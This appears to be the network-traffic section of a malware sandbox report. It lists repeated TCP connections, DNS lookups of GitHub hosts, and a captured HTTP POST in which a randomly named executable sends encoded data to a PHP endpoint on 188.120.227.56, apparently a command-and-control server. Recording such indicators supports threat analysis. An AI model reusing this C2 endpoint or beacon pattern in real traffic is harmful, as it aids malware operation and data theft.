Dec 10, 2024 07:34:31.229319096 CET	49988	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:31.407360077 CET	80	49988	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:31.448153019 CET	49988	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:31.522902012 CET	49988	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:31.523828983 CET	49994	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:31.642807961 CET	80	49988	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:31.642947912 CET	49988	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:31.643106937 CET	80	49994	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:31.643191099 CET	49994	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:31.643409967 CET	49994	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:31.762695074 CET	80	49994	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:32.002367020 CET	49994	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:32.121606112 CET	80	49994	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:32.121716022 CET	80	49994	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:32.121747017 CET	80	49994	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:32.715044975 CET	49994	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:32.718123913 CET	49998	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:32.834770918 CET	80	49994	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:32.834923983 CET	49994	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:32.836060047 CET	49999	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:32.837460041 CET	80	49998	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:32.837583065 CET	49998	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:32.837662935 CET	49998	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:32.955444098 CET	80	49999	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:32.955575943 CET	49999	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:32.955797911 CET	49999	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:32.956865072 CET	80	49998	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:33.075035095 CET	80	49999	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:33.183244944 CET	49998	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:33.302680016 CET	80	49998	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:33.302802086 CET	80	49998	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:33.307564020 CET	49999	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:33.426877975 CET	80	49999	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:33.426903009 CET	80	49999	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:33.427011013 CET	80	49999	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:34.178175926 CET	80	49998	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:34.229479074 CET	49998	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.300720930 CET	80	49999	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:34.354309082 CET	49999	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.445245028 CET	80	49998	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:34.447124004 CET	49983	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.494927883 CET	49998	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.535445929 CET	80	49999	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:34.588730097 CET	49999	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.833573103 CET	49998	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.833659887 CET	49999	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.833923101 CET	50005	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.953103065 CET	80	50005	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:34.953129053 CET	80	49998	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:34.953249931 CET	49998	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.953572989 CET	80	49999	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:34.953598976 CET	50005	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.953638077 CET	49999	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:34.961182117 CET	50005	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:35.080908060 CET	80	50005	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:35.307552099 CET	50005	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:35.426876068 CET	80	50005	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:35.426918983 CET	80	50005	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:35.426940918 CET	80	50005	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:36.288640976 CET	80	50005	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:36.338705063 CET	50005	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:36.523363113 CET	80	50005	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:36.573044062 CET	50005	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:36.647300005 CET	50005	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:36.647598982 CET	50009	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:36.766943932 CET	80	50005	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:36.766962051 CET	80	50009	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:36.767071009 CET	50005	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:36.767146111 CET	50009	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:36.767337084 CET	50009	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:36.886548042 CET	80	50009	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:37.120043039 CET	50009	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:37.239494085 CET	80	50009	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:37.239509106 CET	80	50009	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:37.239546061 CET	80	50009	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:38.097491026 CET	80	50009	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:38.151318073 CET	50009	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:38.331756115 CET	80	50009	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:38.385601044 CET	50009	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:38.460042953 CET	50014	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:38.579385042 CET	80	50014	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:38.582185030 CET	50014	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:38.582412958 CET	50014	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:38.701713085 CET	80	50014	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:38.932765007 CET	50014	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.052083969 CET	80	50014	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:39.052105904 CET	80	50014	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:39.052220106 CET	80	50014	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:39.449167967 CET	50018	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.449423075 CET	50014	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.568419933 CET	50009	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.568500042 CET	80	50018	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:39.568593025 CET	50018	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.568686008 CET	50018	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.570163965 CET	50020	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.595170021 CET	80	50014	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:39.595365047 CET	50014	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.688060045 CET	80	50018	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:39.689661026 CET	80	50020	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:39.689747095 CET	50020	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.689927101 CET	50020	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:39.809441090 CET	80	50020	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:39.916946888 CET	50018	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:40.036396980 CET	80	50018	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:40.036423922 CET	80	50018	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:40.042218924 CET	50020	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:40.161689997 CET	80	50020	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:40.161736965 CET	80	50020	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:40.161748886 CET	80	50020	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:40.938220024 CET	80	50018	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:40.979368925 CET	50018	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.016011953 CET	80	50020	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:41.057523012 CET	50020	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.175407887 CET	80	50018	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:41.229350090 CET	50018	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.252193928 CET	80	50020	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:41.307477951 CET	50020	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.375303030 CET	50018	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.375324965 CET	50020	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.375605106 CET	50025	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.494875908 CET	80	50025	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:41.494899035 CET	80	50018	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:41.495191097 CET	50025	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.495196104 CET	50018	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.495482922 CET	80	50020	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:41.495549917 CET	50020	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.495825052 CET	50025	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.615241051 CET	80	50025	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:41.854621887 CET	50025	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:41.973998070 CET	80	50025	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:41.974013090 CET	80	50025	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:41.974024057 CET	80	50025	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:42.822835922 CET	80	50025	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:42.869957924 CET	50025	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:43.055131912 CET	80	50025	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:43.104454041 CET	50025	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:43.183952093 CET	50025	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:43.184360027 CET	50030	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:43.304908037 CET	80	50025	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:43.305061102 CET	80	50030	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:43.305290937 CET	50025	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:43.305587053 CET	50030	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:43.305587053 CET	50030	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:43.424804926 CET	80	50030	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:43.651774883 CET	50030	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:43.771260023 CET	80	50030	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:43.771275043 CET	80	50030	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:43.771286964 CET	80	50030	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:44.632543087 CET	80	50030	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:44.682473898 CET	50030	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:44.867389917 CET	80	50030	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:44.916877031 CET	50030	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:44.995551109 CET	50035	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:45.114865065 CET	80	50035	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:45.114964962 CET	50035	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:45.115212917 CET	50035	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:45.234466076 CET	80	50035	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:45.463972092 CET	50035	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:45.583484888 CET	80	50035	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:45.583508968 CET	80	50035	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:45.583523035 CET	80	50035	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.183850050 CET	50039	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.184205055 CET	50035	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.303152084 CET	80	50039	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.303385019 CET	50039	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.303693056 CET	50039	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.303838968 CET	80	50035	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.303919077 CET	50035	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.324614048 CET	50040	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.422956944 CET	80	50039	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.443944931 CET	80	50040	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.444088936 CET	50040	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.444421053 CET	50040	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.563637972 CET	80	50040	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.651458025 CET	50039	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.770813942 CET	80	50039	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.770946980 CET	80	50039	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.792287111 CET	50040	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:46.912894011 CET	80	50040	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.913037062 CET	80	50040	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:46.913048029 CET	80	50040	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:47.642323017 CET	80	50039	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:47.698138952 CET	50039	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:47.783421040 CET	80	50040	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:47.838709116 CET	50040	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:47.891375065 CET	80	50039	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:47.932688951 CET	50039	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.023247957 CET	80	50040	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:48.073278904 CET	50040	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.154201031 CET	50039	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.154280901 CET	50040	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.154625893 CET	50043	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.273818016 CET	80	50039	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:48.273865938 CET	80	50043	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:48.274116039 CET	50039	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.274202108 CET	50043	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.274281025 CET	80	50040	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:48.274359941 CET	50040	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.274549007 CET	50043	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.393829107 CET	80	50043	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:48.620500088 CET	50043	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:48.740036964 CET	80	50043	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:48.740050077 CET	80	50043	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:48.740159988 CET	80	50043	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:49.606120110 CET	80	50043	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:49.651376009 CET	50043	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:49.839416027 CET	80	50043	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:49.885633945 CET	50043	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:49.991774082 CET	50043	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:49.992151022 CET	50044	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:50.111484051 CET	80	50044	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:50.111515999 CET	80	50043	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:50.111715078 CET	50043	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:50.111931086 CET	50044	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:50.111931086 CET	50044	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:50.231456041 CET	80	50044	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:50.463951111 CET	50044	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:50.583389044 CET	80	50044	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:50.583554029 CET	80	50044	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:50.583564997 CET	80	50044	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:51.452209949 CET	80	50044	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:51.495109081 CET	50044	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:51.687386036 CET	80	50044	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:51.729365110 CET	50044	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:51.807528019 CET	50044	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:51.808757067 CET	50045	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:51.927355051 CET	80	50044	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:51.927568913 CET	50044	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:51.928241014 CET	80	50045	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:51.928356886 CET	50045	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:51.928684950 CET	50045	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:52.048432112 CET	80	50045	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:52.276639938 CET	50045	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:52.396250010 CET	80	50045	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:52.396266937 CET	80	50045	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:52.396276951 CET	80	50045	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:53.260946035 CET	80	50045	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:53.307447910 CET	50045	80	192.168.2.7	188.120.227.56
Dec 10, 2024 07:34:53.497664928 CET	80	50045	188.120.227.56	192.168.2.7
Dec 10, 2024 07:34:53.541830063 CET	50045	80	192.168.2.7	188.120.227.56

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 10, 2024 07:32:48.286226988 CET	61450	53	192.168.2.7	1.1.1.1
Dec 10, 2024 07:32:48.422633886 CET	53	61450	1.1.1.1	192.168.2.7
Dec 10, 2024 07:32:51.020401001 CET	59433	53	192.168.2.7	1.1.1.1
Dec 10, 2024 07:32:51.159933090 CET	53	59433	1.1.1.1	192.168.2.7
Dec 10, 2024 07:32:57.080662012 CET	59806	53	192.168.2.7	1.1.1.1
Dec 10, 2024 07:32:57.219125986 CET	53	59806	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Dec 10, 2024 07:32:48.286226988 CET	192.168.2.7	1.1.1.1	0xadf4	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 07:32:51.020401001 CET	192.168.2.7	1.1.1.1	0xb06b	Standard query (0)	objects.githubusercontent.com	A (IP address)	IN (0x0001)	false
Dec 10, 2024 07:32:57.080662012 CET	192.168.2.7	1.1.1.1	0x6649	Standard query (0)	github.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Dec 10, 2024 07:32:48.422633886 CET	1.1.1.1	192.168.2.7	0xadf4	No error (0)	github.com	20.233.83.145	A (IP address)	IN (0x0001)	false
Dec 10, 2024 07:32:51.159933090 CET	1.1.1.1	192.168.2.7	0xb06b	No error (0)	objects.githubusercontent.com	185.199.110.133	A (IP address)	IN (0x0001)	false
Dec 10, 2024 07:32:51.159933090 CET	1.1.1.1	192.168.2.7	0xb06b	No error (0)	objects.githubusercontent.com	185.199.109.133	A (IP address)	IN (0x0001)	false
Dec 10, 2024 07:32:51.159933090 CET	1.1.1.1	192.168.2.7	0xb06b	No error (0)	objects.githubusercontent.com	185.199.108.133	A (IP address)	IN (0x0001)	false
Dec 10, 2024 07:32:51.159933090 CET	1.1.1.1	192.168.2.7	0xb06b	No error (0)	objects.githubusercontent.com	185.199.111.133	A (IP address)	IN (0x0001)	false
Dec 10, 2024 07:32:57.219125986 CET	1.1.1.1	192.168.2.7	0x6649	No error (0)	github.com	20.233.83.145	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

github.com

objects.githubusercontent.com

188.120.227.56

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.7	49797	188.120.227.56	80	6196	C:\Program Files (x86)\Java\HHfZjsufdvzxFpnqfrPtJXXoIspuxA.exe

Timestamp	Bytes transferred	Direction	Data
Dec 10, 2024 07:33:29.553147078 CET	292	OUT	POST /VoiddbVoiddb/secureAuthgamelongpollapiBigloadcdn.php HTTP/1.1 Content-Type: application/octet-stream User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0 Host: 188.120.227.56 Content-Length: 336 Expect: 100-continue Connection: Keep-Alive
Dec 10, 2024 07:33:29.901859045 CET	336	OUT	Data Raw: 05 06 04 00 03 0f 04 02 05 06 02 01 02 05 01 05 00 04 05 0e 02 01 03 0d 03 05 0a 05 05 07 06 00 0c 0e 04 5c 07 06 04 57 0e 53 06 05 00 06 05 54 06 54 0c 0b 0f 0f 04 57 06 07 04 02 04 50 07 0f 05 06 0c 01 06 04 04 09 0e 52 0c 07 0a 0d 0b 04 07 07 Data Ascii: \WSTTWPRS\L~@h`~@tbv\vfoSlz_ct\|Z`K{lZ_{pfIhTcUvglL~O~V@{Cn~ey
Dec 10, 2024 07:33:30.884285927 CET	25	IN	HTTP/1.1 100 Continue
Dec 10, 2024 07:33:30.980232954 CET	1236	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 10 Dec 2024 06:33:30 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Vary: Accept-Encoding Data Raw: 35 37 34 0d 0a 56 4a 7e 07 78 6d 55 02 78 61 67 5d 68 5f 74 58 6a 49 6f 0a 6b 5e 53 40 7a 05 7f 59 6a 62 7b 5c 76 63 5b 08 7a 71 65 49 62 65 7f 5a 7d 5b 78 01 55 4b 72 54 74 4c 5e 5e 7f 5b 7d 04 68 5e 62 0b 6f 5f 70 09 7c 70 64 5a 76 72 53 4f 77 62 75 47 6b 62 75 5c 6a 7c 78 08 7e 59 56 59 61 5c 7b 06 7c 5c 5b 4a 7e 5e 69 49 79 74 7f 59 7b 49 5a 4f 78 6d 7c 59 7a 5b 7f 58 7b 5a 7e 06 7c 4e 6c 01 6f 59 74 02 7d 5b 6f 07 62 5f 63 5a 7a 51 41 5b 68 59 56 0c 6b 61 79 43 61 52 70 41 78 42 60 02 74 4e 53 53 6e 71 7d 49 7d 55 79 5b 7a 61 5f 5a 77 63 52 59 75 5f 7c 02 76 62 72 50 7e 5d 7a 06 60 5b 7d 01 76 66 68 09 6b 7c 66 58 77 6f 73 5d 7f 5d 6f 59 78 6f 64 5a 6c 60 66 44 7c 6d 51 51 77 5e 7c 04 7e 62 5f 50 7e 7d 67 4f 6f 6e 66 41 69 61 69 4d 7b 5d 46 51 7f 42 60 0c 7d 70 78 42 7d 67 72 4c 6f 7d 7b 00 6f 5c 5d 5b 7f 61 63 02 7e 74 78 52 7c 73 7d 09 79 60 6f 59 7e 5c 74 48 60 60 75 51 7b 5c 79 49 76 58 64 4b 7e 66 5a 4d 7d 66 53 41 77 4c 67 4b 7c 62 7d 4f 7c 49 7a 0a 79 66 68 0a 7d 4d 7f 00 76 4c 69 02 77 [TRUNCATED] Data Ascii: 574VJ~xmUxag]h_tXjIok^S@zYjb{\vc[zqeIbeZ}[xUKrTtL^^[}h^bo_p\|pdZvrSOwbuGkbu\j\|x~YVYa\{\|\[J~^iIytY{IZOxm\|Yz[X{Z~\|NloYt}[ob_cZzQA[hYVkayCaRpAxB`tNSSnq}I}Uy[za_ZwcRYu_\|vbrP~]z`[}vfhk\|fXwos]]oYxodZl`fD\|mQQw^\|~b_P~}gOonfAiaiM{]FQB`}pxB}grLo}{o\][ac~txR\|s}y`oY~\tH``uQ{\yIvXdK~fZM}fSAwLgK\|b}O\|Izyfh}MvLiw_[~qj}BVAw{waYxrq~`S{wxN{IR{mUyLtI{]zA`ZxY^K~\gNu_\|I}\|gKI`_WullA{R`wpbC{quH~\|bxOPus{u_xOvabCp~vryv[x\|BqwB^B\|]xJxBQ{`P}mhtIZ~rz@\|m]xCbO~ryptA\|lZA}pd}In{mk{btFasD~Yc~`[ycRB~\pHtMeB{qSvv\|J\|vp~v[BwbY\|\a\|gT@yf`@}]Uubutaa~qv}BlA}wQv_wI{bq}paDxYRMxgRxmczbRF{sb{]NZ{wpI}Lgwq\|G~R{hw\|_fUvpxR{ZtN~zr]~v_z\y\}b`g{ZL~Jx^fvbivv`B\|Rawp\|c\|JxlwHzs}_kTR`gk]}rvzSYQVq}@T[\\hl{OSp{HilkPPyMTapTqDkpEQtNORYn`wfqcK]qTO}\GZvugZ}uc[}f~Tc[`[hrf^kgrA{HkPi`t[vqb[t_~[hjXVFPjdE[rJoTEkr_UkoXUh\yP{{\dy]rOMJ{YRZu\|YbbGQp`\Sd^kX]kp\|S]]MucV~BzQD_oeG[pNbYCa}Uk_A[_qqZTUAro[sGx^NZl`DVsKhULasZj[NQRxNo~b [TRUNCATED]
Dec 10, 2024 07:33:30.980247974 CET	224	IN	Data Raw: 5e 5f 51 60 5a 6f 06 79 70 59 47 5a 5a 43 51 78 76 7a 5d 62 65 08 45 51 7a 67 59 51 65 0d 5e 60 04 0b 02 50 58 62 4c 57 66 7d 4f 6c 75 6c 51 7c 5e 78 66 6d 4f 71 45 70 58 5c 5c 53 06 71 42 54 6f 51 49 52 5f 0b 59 5a 06 64 45 51 7e 72 05 67 59 7e Data Ascii: ^_Q`ZoypYGZZCQxvz]beEQzgYQe^`PXbLWf}OlulQ\|^xfmOqEpX\\SqBToQIR_YZdEQ~rgY~Gl`p_o@Wa`]muweQpqhltZzp]ia@Z}c^RoTkMVrXLbodZcg~}^rzQD_oeG[pNbYCayOSZaG[[n@\tPSoe\vQszSsW{tpWceJSnwQpZN_jaNP~No[ChH_V
